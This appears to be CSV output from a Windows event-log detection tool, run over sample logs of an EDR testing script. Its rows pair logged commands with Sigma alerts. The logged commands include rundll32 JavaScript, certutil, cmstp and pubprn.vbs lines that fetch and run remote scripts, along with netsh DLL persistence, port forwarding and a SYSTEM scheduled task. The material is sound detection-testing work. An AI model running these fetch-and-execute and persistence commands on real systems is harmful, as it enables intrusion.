+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace show status : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace stop : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace show status : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace show status ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace stop : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: 
C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL 
Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat : Path: C:\Windows\System32\dispdiag.exe : User: MSEDGEWIN10\IEUser : Parent Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in 
CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: 
C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmstp.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm qc -q : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 
06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 